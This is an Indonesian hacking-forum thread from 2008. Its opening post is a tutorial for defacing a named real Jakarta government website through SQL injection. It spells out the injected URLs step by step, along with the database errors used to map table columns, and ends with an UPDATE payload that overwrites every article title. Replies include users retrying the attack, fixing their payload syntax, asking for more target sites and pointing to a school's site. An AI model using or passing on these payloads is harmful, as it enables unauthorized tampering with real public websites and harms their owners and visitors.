| Deface dengan SQL Injection | |
|
+9tukulesto CYB3R_TR0N MaDOnk himoe cYb3r_jOk3 Uzuma_dOnezA cr4wl3r funky_shensey bL4Ck_3n91n3 13 posters |
Pengirim | Message |
---|
bL4Ck_3n91n3 MotherFucker!?
Jumlah posting : 568 Join date : 18.04.08
| Subyek: Deface dengan SQL Injection Sat May 31, 2008 1:53 am | |
| Halo… teman2!! Ketemu lagi dengan makhluk tuhan yang paling ganteng -.-” hehehe kek lagu aja yah… yaudah gak papa kek lagu… yang penting gw tetap ganteng Tutorial kali ini adalah deface melalui url dengan menggunakan sql injection… hhmm… untuk tutor kali ini kita (loe aja kali!!) akan menggunakan sebuah web untuk percobaan… Webnya adalah… http://pemakaman.jakarta.go.id/hehehe… web pemerintah… gak papa kok yang perlu kita lakukan pertama adalah membuka salah satu link artikelnya, contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102untuk mengetahui apakah web tersebut terkena bugs sql injection… kita akan menambahkan satu karakter ‘ setelah kode artikel… contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′Oooopppsss keknya terjadi error…. Microsoft OLE DB Provider for SQL Server error ‘80040e14′ Unclosed quotation mark before the character string ‘102′ order by creationdate DESC’. /artikel.asp, line 230 berarti bisa dipastikan klo website tersebut terkena bugs… oke… ayo kita buat error lagi, sampe orgasme… loh!? kali ini kita membuat error dengan : having 1=1;– contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ having 1=1;– errornya seperti ini : Microsoft OLE DB Provider for SQL Server error ‘80040e14′ Column ‘py_Naskah.naskah_id’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /artikel.asp, line 230 py_Naskah.naskah_id ini adalah nama tabel dan kolom database py_Naskah => nama tabel naskah_id => nama kolom sekarang kita cari tau tabel berikutnya… contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.naskah_id having 1=1;– error lagi : Microsoft OLE DB Provider for SQL Server error ‘80040e14′ Column ‘py_Naskah.category’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /artikel.asp, line 230 sekarang kita dapat py_Naskah.category berarti kitambah di urlnya contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.category,py_Naskah.naskah_id having 1=1;– error berikutnya : Microsoft OLE DB Provider for SQL Server error ‘80040e14′ Column ‘py_Naskah.Publish’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /artikel.asp, line 230 urlnya menjadi : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.category,py_Naskah.naskah_id,py_Naskah.Publish having 1=1;– nah kita udah dapat nama kolom judulnya yaitu : py_Naskah.title untuk merubahnya kita menggunakan cara berikut : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ update py_Naskah set title=’Hacked by me’;– HasilnyaOke that’s all Good Luck http://bl4ckb0t.co.cc/ | |
|
| |
funky_shensey Admin
Jumlah posting : 356 Join date : 07.05.08 Lokasi : gorontalo
| Subyek: Re: Deface dengan SQL Injection Sat May 31, 2008 2:35 am | |
| wew kayakna mantaf neehh ciba ahhkk | |
|
| |
cr4wl3r I'am Not Hacker
Jumlah posting : 373 Join date : 18.04.08 Age : 38 Lokasi : In Your Mind
| Subyek: Re: Deface dengan SQL Injection Sun Jun 01, 2008 12:35 am | |
| bl4ck gitu loch | |
|
| |
bL4Ck_3n91n3 MotherFucker!?
Jumlah posting : 568 Join date : 18.04.08
| Subyek: Re: Deface dengan SQL Injection Sun Jun 01, 2008 5:46 am | |
| hehehe... iya kali | |
|
| |
Uzuma_dOnezA Script Kiddies
Jumlah posting : 111 Join date : 10.05.08 Age : 33 Lokasi : vallembank
| Subyek: Re: Deface dengan SQL Injection Wed Jun 04, 2008 3:19 am | |
| | |
|
| |
cYb3r_jOk3 Script Kiddies
Jumlah posting : 232 Join date : 12.05.08 Age : 36 Lokasi : mAlaNk jAWatiMUr
| Subyek: Re: Deface dengan SQL Injection Wed Jun 04, 2008 3:31 am | |
| | |
|
| |
bL4Ck_3n91n3 MotherFucker!?
Jumlah posting : 568 Join date : 18.04.08
| Subyek: Re: Deface dengan SQL Injection Sun Jun 29, 2008 11:35 am | |
| | |
|
| |
himoe Script Kiddies
Jumlah posting : 133 Join date : 10.06.08 Lokasi : Soo Low
| Subyek: Re: Deface dengan SQL Injection Mon Jul 07, 2008 6:31 pm | |
| | |
|
| |
bL4Ck_3n91n3 MotherFucker!?
Jumlah posting : 568 Join date : 18.04.08
| Subyek: Re: Deface dengan SQL Injection Thu Jul 10, 2008 9:32 pm | |
| maksudnya apa yah? maklum ganteng2 tapi newbie gak sama ama ascii yang master heker | |
|
| |
himoe Script Kiddies
Jumlah posting : 133 Join date : 10.06.08 Lokasi : Soo Low
| Subyek: Re: Deface dengan SQL Injection Fri Jul 11, 2008 5:57 pm | |
| - bL4Ck_3n91n3 wrote:
- maksudnya apa yah?
maklum ganteng2 tapi newbie gak sama ama ascii yang master heker aBaNg Bisa Ja nTu... TuTorial YaNg da DI aTaS no Kudu di KasiH tanda ' DeFace yang gak pke taNda ' gMna aTu aBaNG ?? kYa Ni weB puNya sCuL q siCh http://sman1-prob.sch.idHalaMan aDminNya Beda atu BaNG http://sman1-prob.sch.id/admin.php | |
|
| |
bL4Ck_3n91n3 MotherFucker!?
Jumlah posting : 568 Join date : 18.04.08
| Subyek: Re: Deface dengan SQL Injection Fri Jul 11, 2008 8:10 pm | |
| yang atas ntu kan cuman buat database yang pake software iis lain lagi klo yang pake sopwer mysql | |
|
| |
himoe Script Kiddies
Jumlah posting : 133 Join date : 10.06.08 Lokasi : Soo Low
| Subyek: Re: Deface dengan SQL Injection Sat Jul 12, 2008 11:12 am | |
| - bL4Ck_3n91n3 wrote:
- yang atas ntu kan cuman buat database yang pake software iis lain lagi klo yang pake sopwer mysql
MaKaciii Yaaa BaNg...... bRu Tw aQ masiH nYuBi NicH.......... | |
|
| |
MaDOnk Newbie
Jumlah posting : 35 Join date : 09.07.08
| Subyek: Re: Deface dengan SQL Injection Mon Jul 14, 2008 4:13 pm | |
| kk belack emang kenyen /me brb belajar lagi | |
|
| |
CYB3R_TR0N Script Kiddies
Jumlah posting : 133 Join date : 25.05.08 Age : 31 Lokasi : Makam Selatan
| |
| |
bL4Ck_3n91n3 MotherFucker!?
Jumlah posting : 568 Join date : 18.04.08
| |
| |
tukulesto Developt Kiddie
Jumlah posting : 581 Join date : 17.05.08 Age : 38 Lokasi : dimana ada kamu, aku pasti ada
| |
| |
Mr.C Admin
Jumlah posting : 37 Join date : 13.05.08
| Subyek: Re: Deface dengan SQL Injection Thu Aug 14, 2008 6:19 am | |
| kacian... udah mati.. tapi masih di umbat para hacker...
btw.. bro tadi gw coba.. tapi udah gak jadi di site itu...
ada site lainnya gak? | |
|
| |
massmissile Newbie
Jumlah posting : 29 Join date : 01.08.08 Age : 39 Lokasi : Command Center
| Subyek: Re: Deface dengan SQL Injection Thu Aug 14, 2008 1:22 pm | |
| - bL4Ck_3n91n3 wrote:
- CYB3R_TR0N wrote:
-
Ajarin donk kaka . lewat ym atau irc Ka, ko abis ditambahin having 1=1 ;- errornya beda ya, jadi gini nih.. Microsoft OLE DB Provider for SQL Server error '80040e14' Line 1: Incorrect syntax near '�'. /artikel.asp, line 230 Tu kenapa tuh??Mohon jawabannya n mav tlat nyoba...Thx b4 | |
|
| |
bL4Ck_3n91n3 MotherFucker!?
Jumlah posting : 568 Join date : 18.04.08
| Subyek: Re: Deface dengan SQL Injection Thu Aug 14, 2008 6:43 pm | |
| - massmissile wrote:
- bL4Ck_3n91n3 wrote:
- CYB3R_TR0N wrote:
-
Ajarin donk kaka . lewat ym atau irc Ka, ko abis ditambahin having 1=1 ;- errornya beda ya, jadi gini nih..
Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near '�'.
/artikel.asp, line 230
Tu kenapa tuh??Mohon jawabannya n mav tlat nyoba...Thx b4 kau aja yang dodol harusnya ntu having 1=1;-- perhatikan baik2 apa bedanya loe pake spasi sedangkan gw kagak trus loe pake tanda - cuman satu sedangkan gw dua halah | |
|
| |
massmissile Newbie
Jumlah posting : 29 Join date : 01.08.08 Age : 39 Lokasi : Command Center
| |
| |
massmissile Newbie
Jumlah posting : 29 Join date : 01.08.08 Age : 39 Lokasi : Command Center
| Subyek: Re: Deface dengan SQL Injection Fri Aug 15, 2008 2:56 am | |
| - bL4Ck_3n91n3 wrote:
- massmissile wrote:
- bL4Ck_3n91n3 wrote:
- CYB3R_TR0N wrote:
-
Ajarin donk kaka . lewat ym atau irc Ka, ko abis ditambahin having 1=1 ;- errornya beda ya, jadi gini nih..
Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near '�'.
/artikel.asp, line 230
Tu kenapa tuh??Mohon jawabannya n mav tlat nyoba...Thx b4 kau aja yang dodol
harusnya ntu having 1=1;-- perhatikan baik2 apa bedanya loe pake spasi sedangkan gw kagak trus loe pake tanda - cuman satu sedangkan gw dua halah BERHASIL JURAGAAAAAANNNNNN BLACK....GIVE ME MORE KNOWLEDGE... Btw ka black, web yang pake IIS tu yang belakangnya ini bukan.. .aspx .ascx .htm .asmx .....n masih banyak lg (ane liat di Microsoft ASP.NET Web Matrix...) Mav klo salah... Thx berat atas jawabannya... | |
|
| |
CYB3R_TR0N Script Kiddies
Jumlah posting : 133 Join date : 25.05.08 Age : 31 Lokasi : Makam Selatan
| Subyek: Re: Deface dengan SQL Injection Fri Aug 15, 2008 9:29 am | |
| okok deeh kaka . aku tunguu iia . | |
|
| |
omuth_stebreizh Script Kiddies
Jumlah posting : 157 Join date : 21.05.08 Age : 35 Lokasi : malang
| Subyek: Re: Deface dengan SQL Injection Wed Sep 03, 2008 7:51 pm | |
| | |
|
| |
ascii Admin
Jumlah posting : 379 Join date : 18.04.08
| Subyek: Re: Deface dengan SQL Injection Fri Sep 19, 2008 10:20 pm | |
| @massmissile daripada cari celah site lain.. coba dahulu aplikasi di localhost.. sekalian pengenalan jaringan ,server,database | |
|
| |
Sponsored content
| Subyek: Re: Deface dengan SQL Injection | |
| |
|
| |
| Deface dengan SQL Injection | |
|